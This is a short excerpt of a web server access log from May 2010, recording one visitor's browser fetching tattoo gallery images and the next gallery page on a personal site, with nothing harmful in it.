188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:23 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
